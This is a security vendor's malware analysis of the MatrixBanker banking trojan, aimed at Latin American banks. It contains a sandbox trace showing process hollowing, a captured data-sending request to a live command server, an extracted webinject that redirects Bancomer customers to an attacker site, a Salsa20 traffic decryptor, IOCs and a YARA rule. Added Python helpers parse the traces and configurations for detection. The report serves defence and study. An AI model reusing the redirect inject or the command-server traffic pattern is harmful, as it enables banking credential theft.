
New Trojan on stage, MatrixBanker
Specialist: Luis Angel Fernandez

www.aiuken.com

FOCUSED ON ATTACKING BANKS.

MATRIX BANKER ANALYSE

Although it is a banking malware still in evolution, samples already exist in services like VirusTotal and are identified by the different antivirus engines of the industry. Preliminary investigations of this malware family indicate that the initial infection occurred from Mexican web domains; no other infection pathways, such as exploit kits or spam campaigns, have been detected.

ZEUS TYPE CONFIGURATIONS

• Many of the Trojans that have appeared after ZeuS have adopted its pattern for building configurations and injections.
• This makes it easier for buyers of malware kits to reuse injections or configurations between different malware families.
• Some of the observed families that use ZeuS configurations are among the most used today to attack financial entities.

DMCC I5 Premium Business Centre, Gold Tower, JLT, Dubai, United Arab Emirates

Phone: +971 54 499 4659


New Trojan on stage, MatrixBanker focused on attacking banks.
Specialist: Luis Angel Fernandez
August 2017

A new banking Trojan has been discovered. At the moment it only targets banks in Latin America. The banking Trojan, known as «MatrixBanker», was discovered recently. Little is known about it so far: after the investigations carried out, its C2 servers are still largely inactive, there are no records of major attacks, and no binaries have been observed in circulation, so the operators are expected to be studying the various financial institutions in order to start a campaign in the near future.

A recent investigation has revealed the banking Trojan known as «MatrixBanker». At the moment this Trojan has a very minor presence compared to other families of banking malware such as «Panda Zeus», «Gozi», variants of «ZeuS», «Dridex», etc. In the investigation carried out, only references to affected banks in Mexico and Peru have been found, although recent binaries also affect international banks such as HSBC. The Trojan is believed to be in a development and testing phase, since each configuration currently affects only a few banks and the binary is not being distributed massively.

For now MatrixBanker targets entities in Latin America

ZeuS type configurations

• Many of the Trojans that have appeared after ZeuS have adopted its pattern for building configurations and injections.
• This makes it easier for buyers of malware kits to reuse injections or configurations between different malware families.
• Some of the observed families that use ZeuS configurations are among the most used today to attack financial entities.
• The different groups have adopted the same format, or a very similar one, thanks to the versatility it offers and the ease of adapting it to new targets.
• The adoption by the groups was due to the different ZeuS source code leaks.


MatrixBanker:

Not many internal details of this new family of banking malware are known yet, but it has been possible to name the family thanks to the image showing the control panel of the Trojan:

As can be seen in the login panel, the word «MatrixBanker» is displayed. It should be noted that the web administration panel had already been observed in an earlier sample, prior to MatrixBanker, known as «Win32/RediModiUpd». MatrixBanker-infected computers are easily identifiable thanks to the Mutex the malware leaves in the system and to the persistence method it uses.



Aiuken Cybersecurity 2017

The execution of MatrixBanker does not differ from other families of malware of the same category:

The running process will read information from the system where it is running:

• It reads the "Windows Product ID". The following registry key is accessed by the running processes:
  "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "PRODUCTID")
  "msiexec.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "PRODUCTID")
  "extra_carved_0.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "PRODUCTID")
• Obtaining the system BIOS version:
  "msiexec.exe" (Path: "HKLM\HARDWARE\DESCRIPTION\SYSTEM"; Key: "SYSTEMBIOSVERSION")
• Obtaining the runtime environment:
  "msiexec.exe" (Path: "HKCU\SOFTWARE\VMWARE, INC.")
• Changing memory protection in remote processes:
  "<Input Sample>" changed protection rights in "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76) (Protection: "execute/read/write")
  "<Input Sample>" changed protection rights in "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76) (Protection: "read/write")
• Using process hollowing during execution:
  "<Input Sample>" set thread context in remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (PID 00000b0c)
• Writing data to remote processes:
  "<Input Sample>" wrote 32 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 52 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 4 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 1024 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 4096 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 1536 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 512 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 194560 bytes to a remote process "C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe" (Handle: 76)
  "<Input Sample>" wrote 1500 bytes to a remote process "%WINDIR%\System32\msiexec.exe" (Handle: 412)
  "<Input Sample>" wrote 4 bytes to a remote process "%WINDIR%\System32\msiexec.exe" (Handle: 412)
  "<Input Sample>" wrote 32 bytes to a remote process "%WINDIR%\System32\msiexec.exe" (Handle: 412)
  "<Input Sample>" wrote 52 bytes to a remote process "%WINDIR%\System32\msiexec.exe" (Handle: 412)


• It reads the machine name:
  "<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "msiexec.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "extra_carved_0.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
• Extracting the GUID of the machine:
  "msiexec.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
• Sending data to the C&C:

  POST /forum/logout.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC6.0; .NET4.0C; .NET4.0E; InfoPath.3)
  Host: eaxsess.cat
  Content-Length: 1070
  Cache-Control: no-cache

  rofctqneb=c80a3d37bc00f5880a8417ccc35fad3ddc2d50c412c2&pkzujez=97035447&tslkd=5e514fd1de0f585769ee0bfb3a4a0f22332b548d3b2c78d4edafac653e8c6343443daf2d24b068522da0c5c358245bd3d9a8930c791458c185c97430ab32ef6a2f47f2fa7d6168f1b0d86544f8458457a62f1f0ea6882d981245c9daf717ff5ed143977908774d0cd3759af3a09cbdb77316157c77a963ca421bee763b0bc44b2919c10c65016aa568dcf39e0ecd96ca71ee89b4b82bcf76346dea58ed81e833a82563594a3b6ad1b6b02e9d1b9977b0e42c13857aeab6cb8abb4a39d22d08f61901674c6682378e5076269f1bbc7df47e9ff9e96fc711b5be4716a9881c7d8fd134a8fb11635872727909a6f4f16fa37d68b9b267acc5fde6224af6588c2566cb6eb1efb52fd3bc5a21a2fb1a79ca2141b89a5f3b181eca472735d541fc91787a88598b&vwrsnop1=727E3928432B020A502921194525393C54320C1B5464210A5832000A1117000C4434391B082D5C010835164108251C111F211D1D31&vwrsnop2=58211D085D2B171D1F211D1D31&vwrsnop3=652D0B1A5069353B6D100C16532565&vwrsnop4=782A111D5D6C375111070A0A546C313518640C4F1C70524F010F453B6111453811774B4D01032D0231&vwrsnop5=672D170C4425093A5E3C453F43251510582716587020040845211778&vwrsnop6=7C73543C416951417D69292856713F3B5669513061762378


New Trojan on stage, MatrixBanker focused on attacking banks in LATAM.

• Loading the Execution File:


• Anti-debug methods implemented within the sample:
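The execution trace above is the kind of sandbox output a defender can turn into a detection: the combination of remote writes, an execute/read/write protection change and SetThreadContext against the same target process is the process-hollowing pattern the report points at. The following is an added example, not code from the report, that parses log lines in the same format and scores each source/target pair. The log lines are constructed from the report's trace (same target path, handles and a subset of the byte counts); the event wording the regexes match is assumed to be stable.

```python
import re
from collections import defaultdict

# Constructed sandbox-style log lines, modelled on the trace quoted in the report.
TARGET = r"C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23.exe"
SAMPLE_LOG = "\n".join([
    '"<Input Sample>" changed protection rights in "%s" (Handle: 76) (Protection: "execute/read/write")' % TARGET,
    '"<Input Sample>" changed protection rights in "%s" (Handle: 76) (Protection: "read/write")' % TARGET,
    '"<Input Sample>" set thread context in remote process "%s" (PID 00000b0c)' % TARGET,
    '"<Input Sample>" wrote 32 bytes to a remote process "%s" (Handle: 76)' % TARGET,
    '"<Input Sample>" wrote 194560 bytes to a remote process "%s" (Handle: 76)' % TARGET,
    '"<Input Sample>" wrote 1500 bytes to a remote process "%WINDIR%\\System32\\msiexec.exe" (Handle: 412)',
    '"<Input Sample>" wrote 4 bytes to a remote process "%WINDIR%\\System32\\msiexec.exe" (Handle: 412)',
])

# One regex per event type seen in the trace (assumed wording).
RE_WRITE = re.compile(r'^"(?P<src>[^"]+)" wrote (?P<n>\d+) bytes to a remote process "(?P<dst>[^"]+)"')
RE_CTX = re.compile(r'^"(?P<src>[^"]+)" set thread context in remote process "(?P<dst>[^"]+)"')
RE_PROT = re.compile(r'^"(?P<src>[^"]+)" changed protection rights in "(?P<dst>[^"]+)".*\(Protection: "(?P<prot>[^"]+)"\)')


def parse_trace(text):
    """Aggregate remote-process events per (source, target) pair."""
    stats = defaultdict(lambda: {"writes": 0, "bytes_written": 0,
                                 "set_thread_context": False, "rwx_protection": False})
    for line in text.splitlines():
        m = RE_WRITE.match(line)
        if m:
            s = stats[(m["src"], m["dst"])]
            s["writes"] += 1
            s["bytes_written"] += int(m["n"])
            continue
        m = RE_CTX.match(line)
        if m:
            stats[(m["src"], m["dst"])]["set_thread_context"] = True
            continue
        m = RE_PROT.match(line)
        if m and "execute" in m["prot"]:
            stats[(m["src"], m["dst"])]["rwx_protection"] = True
    return stats


def classify(stats):
    """Label each target: remote writes plus SetThreadContext on the same
    process is treated as hollowing; writes alone are only a remote write."""
    verdicts = {}
    for (src, dst), s in stats.items():
        if s["writes"] and s["set_thread_context"]:
            verdict = "process_hollowing"
        elif s["writes"]:
            verdict = "remote_write"
        else:
            verdict = "none"
        verdicts[dst] = dict(s, source=src, verdict=verdict)
    return verdicts


if __name__ == "__main__":
    for dst, v in classify(parse_trace(SAMPLE_LOG)).items():
        print("%-18s %8d bytes  rwx=%-5s  %s" % (v["verdict"], v["bytes_written"], v["rwx_protection"], dst))
```

The verdict is deliberately per target rather than per line: a single 4-byte write or a single protection change is common in legitimate software, and it is the sequence against one process that is worth alerting on.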


Matrixbanker Configuration:

At the moment, MatrixBanker has been reported targeting banks in Mexico and Peru, although some of the latest variants have been found to affect HSBC. During the analysis, the configuration of one of the MatrixBanker samples was extracted:

  targeturl=*bancomer.com/empresas*&br&&br&<meta http-equiv="refresh" content="0; url=https://16bbanet.com/index.jsp/" />&br&<script>&br&top.location.href="https://16bbanet.com/index.jsp/";&br&</script>

As we can see, the MatrixBanker sample analysed affects the Bancomer and BBANet entities. In the interaction between the infected machine and the affected financial entity, a connection is started to obtain the WebConfig part and carry out the Man-in-the-Browser attack:

The request to the web server is encrypted with Salsa20. It is the first malware seen using this type of encryption in communications with the command and control server. The following Python script can be used to obtain the communications in clear:

  import sys
  import binascii

  # https://pypi.python.org/pypi/salsa20/0.3.0
  import salsa20

  # Read the captured (hex-encoded) request body from the file given as first argument
  with open(sys.argv[1], "rb") as fp:
      data = fp.read()

  # 8-byte IV and 32-byte key observed in the analysed samples
  iv = b"K\x84\x8eH\xf1]E\xa5"
  key = b"\xa1\x9cA\x89\xb4\x9d\x15ae\xf1a\x8bLQj\x16\xf1l\x18\x1d\x81\xb8\x18\x18\xe1\x81e\x1c!\xb8\\e"

  # Strip line breaks, decode the hex and XOR with the Salsa20 keystream
  data_nohex = binascii.unhexlify(data.replace(b"\n", b""))
  plain = salsa20.Salsa20_xor(data_nohex, iv, key)
  print(plain)
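The script above depends on the third-party salsa20 package. As an added example, not the report's own script, the block below implements Salsa20/20 in pure Python from the standard specification, so the same decoding can be done with no dependencies, and reuses the key and IV quoted in the report. The captured body it decodes is constructed locally (a sample configuration string encrypted with that key and IV, hex-encoded and line-wrapped the way the report's script expects); the report's real POST bodies are not decoded here.

```python
import binascii
import struct

MASK = 0xFFFFFFFF
SIGMA = struct.unpack("<4I", b"expand 32-byte k")   # Salsa20 constant for 32-byte keys

# Key and 8-byte IV as given in the report (the same for every sample analysed there).
KEY = b"\xa1\x9cA\x89\xb4\x9d\x15ae\xf1a\x8bLQj\x16\xf1l\x18\x1d\x81\xb8\x18\x18\xe1\x81e\x1c!\xb8\\e"
IV = b"K\x84\x8eH\xf1]E\xa5"
assert len(KEY) == 32 and len(IV) == 8


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _quarter(s, a, b, c, d):
    # Salsa20 quarter-round, in place on the 16-word state
    s[b] ^= _rotl((s[a] + s[d]) & MASK, 7)
    s[c] ^= _rotl((s[b] + s[a]) & MASK, 9)
    s[d] ^= _rotl((s[c] + s[b]) & MASK, 13)
    s[a] ^= _rotl((s[d] + s[c]) & MASK, 18)


def salsa20_block(key, nonce, counter):
    """64-byte keystream block for the given 64-bit block counter."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    state = [SIGMA[0], k[0], k[1], k[2], k[3], SIGMA[1], n[0], n[1],
             counter & MASK, (counter >> 32) & MASK, SIGMA[2], k[4], k[5], k[6], k[7], SIGMA[3]]
    x = list(state)
    for _ in range(10):                      # 20 rounds = 10 double rounds
        _quarter(x, 0, 4, 8, 12); _quarter(x, 5, 9, 13, 1)     # column round
        _quarter(x, 10, 14, 2, 6); _quarter(x, 15, 3, 7, 11)
        _quarter(x, 0, 1, 2, 3); _quarter(x, 5, 6, 7, 4)       # row round
        _quarter(x, 10, 11, 8, 9); _quarter(x, 15, 12, 13, 14)
    return struct.pack("<16I", *[(x[i] + state[i]) & MASK for i in range(16)])


def salsa20_xor(data, nonce, key):
    """XOR data with the keystream; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = salsa20_block(key, nonce, i // 64)
        out.extend(b ^ k for b, k in zip(data[i:i + 64], ks))
    return bytes(out)


def decode_capture(hex_text, key=KEY, nonce=IV):
    """Same pre-processing as the report's script: drop newlines, unhex, XOR."""
    if isinstance(hex_text, bytes):
        hex_text = hex_text.decode()
    raw = binascii.unhexlify(hex_text.replace("\n", "").strip())
    return salsa20_xor(raw, nonce, key)


def constructed_capture(plaintext=b"targeturl=*example-bank.test/login*&br&<script>&br&</script>"):
    """Build a line-wrapped hex body like the one the report's script reads (constructed data)."""
    ct_hex = salsa20_xor(plaintext, IV, KEY).hex()
    return "\n".join(ct_hex[i:i + 32] for i in range(0, len(ct_hex), 32)) + "\n"


if __name__ == "__main__":
    print(decode_capture(constructed_capture()))
```

Because Salsa20 is a stream cipher, reusing one key and IV across every sample (as the report observes) means the same keystream protects every message; two captures XORed together cancel the keystream, which is why a fixed key/IV pair makes this traffic recoverable even without the key.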


So far the key and the initialization vector (IV) have been the same for all the samples we have analysed. Although functional, the webinject format seems to be under construction. Previous samples used a different and simpler format, and there is a lot of work to be done to catch up with the industry-standard ZeuS webinjects. The rules are "\n" separated and there are two types: "rule1" and "rule2". For the moment we have only seen "rule2". The target financial institution is specified in "targeturl". The remaining pieces, which are "&br&" delimited, are finally concatenated and injected into the page if the browser visits a target URL.
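A parser for the webinject format described here, written as an added example (not the report's tooling): rules are split on "\n", the first "&br&"-delimited piece carries the targeturl glob, and the rest are concatenated into the injected HTML. The configuration text is constructed from the single rule quoted in the report plus a second made-up rule with a placeholder hostname, so that multi-rule handling is exercised. The "rule1"/"rule2" type marker is not visible in the quoted sample, so the parser does not model it.

```python
import fnmatch
import re

# Constructed configuration: the rule quoted in the report plus one placeholder rule.
CONFIG = (
    'targeturl=*bancomer.com/empresas*&br&&br&'
    '<meta http-equiv="refresh" content="0; url=https://16bbanet.com/index.jsp/" />'
    '&br&<script>&br&top.location.href="https://16bbanet.com/index.jsp/";&br&</script>\n'
    'targeturl=*example-bank.test/login*&br&<script>&br&/* constructed second rule */&br&</script>\n'
)


def parse_webinject(config_text):
    """Return one dict per rule: the target URL glob and the concatenated inject."""
    rules = []
    for line in config_text.split("\n"):
        if not line.strip():
            continue
        pieces = line.split("&br&")
        head = pieces[0]
        if not head.startswith("targeturl="):
            raise ValueError("rule without targeturl: %r" % line[:40])
        rules.append({
            "targeturl": head[len("targeturl="):],
            "inject": "".join(pieces[1:]),   # remaining pieces are concatenated as-is
        })
    return rules


def matching_rules(rules, url):
    """Rules whose targeturl glob matches the visited URL (case-sensitive glob, '*' spans '/')."""
    return [r for r in rules if fnmatch.fnmatchcase(url, r["targeturl"])]


def redirect_hosts(rule):
    """Hostnames referenced by the injected HTML, useful for blocklists and hunting."""
    return sorted(set(re.findall(r'https?://([^/"\s]+)', rule["inject"])))


def targeted_entities(rules):
    """Distinct target globs, i.e. the institutions a configuration goes after."""
    return sorted({r["targeturl"] for r in rules})


if __name__ == "__main__":
    parsed = parse_webinject(CONFIG)
    for r in parsed:
        print(r["targeturl"], "->", redirect_hosts(r))
    print(matching_rules(parsed, "https://www.bancomer.com/empresas/login") == [parsed[0]])
```

Running a new configuration through targeted_entities and redirect_hosts gives the two lists a SOC actually needs from a webinject: which customer-facing URLs are targeted and which attacker-controlled hosts the victim is redirected to.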

IOCs

MD5:
05a4fbfacc9774acbb778070956b9acf
0d07363187dcda999e1a6e750ed7a57a
ab2b418b43d59623af082db78402266d4db81441
c0f122be90c55a2e091066fb631f7cfc

C2:
hxxp://5.206.225[.]25/api/ping.php
hxxp://eaxsess[.]cat/concat/api/ping.php
hxxp://gagaxx[.]cat/concat/api/ping.php
hxxp://nknkd[.]cat/redir/api/ping.php
hxxp://trtr44[.]cat/concat/api/ping.php
hxxp://drdrfdd[.]cat/concat/api/ping.php


YARA rules:

  import "pe"

  rule matrix_banker {
      meta:
          description = "Regla para detectar Matrix Banker"
          author = "Aiuken Solutions"
      strings:
          $x1 = "C:\\Users\\W7\\Downloads\\kur\\Redir\\Bin\\Loader.pdb" fullword ascii
          $x2 = "C:\\Users\\W7\\Downloads\\kur\\Redir\\Bin\\main_64.pdb" fullword ascii
          $x3 = "[INJECT] inject_via_remotethread_wow64: pExecuteX64=0x%08p, pX64function=0x%08p, ctx=0x%08p" fullword ascii
          $x4 = "OPERA.EXE" fullword ascii
          $s5 = "CHROME.DLL" fullword ascii
          $s6 = "Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"" fullword ascii
          $s7 = "NSPR4.DLL" fullword ascii
          $s8 = "NSS3.DLL" fullword ascii
          $s9 = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" fullword ascii
          $s10 = "main_64.dll" fullword ascii
          $s11 = "main_32.dll" fullword ascii
          $s12 = "targeturl=" fullword ascii
          $s13 = "LoaderMutex" fullword ascii
          $s14 = "cn.bing.com" fullword ascii
          $s15 = "SOFTWARE\\AppDataLow\\" fullword ascii
          $s16 = "CreateRemoteThread Success" fullword ascii
          $s17 = "Content-Security-Policy:" fullword ascii
          $s18 = "concat/api/ping.php?uuid=%s&country=%s" fullword ascii
          $s19 = "ReflectiveLoader" fullword ascii
          $s20 = "_ReflectiveLoader@20" fullword ascii
      condition:
          ( uint16(0) == 0x5a4d and filesize < 1000KB and pe.imphash() == "4f9a1b151e9e33915dff4c4ef5ac0a41" and ( 1 of ($x*) or 4 of ($s*) ) ) or ( all of them )
  }


Feel free to contact us:


OVANES MIKHAYLOV
INTERNATIONAL BUSINESS DEVELOPMENT DIRECTOR

[email protected]

www.aiuken.com/uae

DMCC I5 Premium Business Centre, Gold Tower, JLT, Dubai, United Arab Emirates
Phone: +971 54 499 4659